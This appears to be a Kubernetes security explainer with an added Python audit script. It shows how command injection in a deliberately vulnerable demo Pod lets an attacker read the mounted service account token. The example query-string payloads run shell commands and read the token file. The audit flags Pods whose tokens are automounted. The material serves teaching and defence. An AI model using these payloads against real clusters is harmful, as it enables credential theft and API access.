An application that is deployed in the cluster and is vulnerable to a remote code execution vulnerability, or to a vulnerability that eventually allows code execution, enables attackers to run code in the cluster. If a service account token is mounted into the container (the default behavior in Kubernetes), the attacker will be able to send requests to the API server using that service account's credentials (see also “Access the K8s API server“).
We deploy a Pod which contains an application vulnerability that can be exploited to gain remote code execution (RCE).
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-pod
spec:
  containers:
  - image: disenchant/vulnerable-app-demo
    name: vulnerable-app
    ports:
    - containerPort: 80
(To keep this example minimal, we assume the container port was made reachable from outside the cluster, e.g. by using an Ingress.)
By accessing a URL like http://www.example.com/?shell=whoami (the domain pointing to our Pod) we can exploit the simple vulnerability and execute the shell command whoami. With something like http://www.example.com/?shell=cat%20/var/run/secrets/kubernetes.io/serviceaccount/token we can read the service account token that is mounted into the container, because the application executes the shell command cat /var/run/secrets/kubernetes.io/serviceaccount/token inside the container.
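As an added example (not part of the original page), a small Python audit that flags Pods in which any code running in the container would find a service account token under /var/run/secrets/kubernetes.io/serviceaccount/, which is the exposure used above. The sample manifests are constructed; the hardened variant assumes the standard spec.automountServiceAccountToken: false setting, and the audit applies the Pod-over-ServiceAccount precedence Kubernetes uses for that field.

```python
import json

# Constructed sample manifests, shaped like the items in `kubectl get pods -o json`.
# The first mirrors the page's vulnerable-pod; the second is the same Pod with the
# default token mount switched off via spec.automountServiceAccountToken.
VULNERABLE_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "vulnerable-pod", "namespace": "default"},
    "spec": {"containers": [{"name": "vulnerable-app",
                             "image": "disenchant/vulnerable-app-demo"}]},
}
HARDENED_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "vulnerable-pod-hardened", "namespace": "default"},
    "spec": {"automountServiceAccountToken": False,
             "containers": [{"name": "vulnerable-app",
                             "image": "disenchant/vulnerable-app-demo"}]},
}


def token_is_mounted(pod, service_account=None):
    """True if a service account token will be projected into the Pod's containers.

    Precedence: spec.automountServiceAccountToken on the Pod, then the same field on
    the referenced ServiceAccount, else mounted (the Kubernetes default). An explicit
    projected serviceAccountToken volume counts as mounted even if automount is off.
    """
    spec = pod.get("spec", {})
    for vol in spec.get("volumes", []):
        for src in vol.get("projected", {}).get("sources", []):
            if "serviceAccountToken" in src:
                return True
    if "automountServiceAccountToken" in spec:
        return bool(spec["automountServiceAccountToken"])
    if service_account and "automountServiceAccountToken" in service_account:
        return bool(service_account["automountServiceAccountToken"])
    return True


def audit_pod_list(pod_list_json, service_accounts=None):
    """Return 'namespace/name' for every Pod in a PodList (kubectl -o json output)
    whose containers can read a token; service_accounts is keyed by (ns, name)."""
    sas = service_accounts or {}
    findings = []
    for pod in json.loads(pod_list_json).get("items", []):
        ns = pod.get("metadata", {}).get("namespace", "default")
        sa_name = pod.get("spec", {}).get("serviceAccountName", "default")
        if token_is_mounted(pod, sas.get((ns, sa_name))):
            findings.append(f"{ns}/{pod['metadata']['name']}")
    return findings
```

Feed it the output of `kubectl get pods -A -o json`; every Pod it lists would hand an attacker with RCE in that container a usable API credential, so those are the workloads to review for `automountServiceAccountToken: false` or a minimal RBAC role.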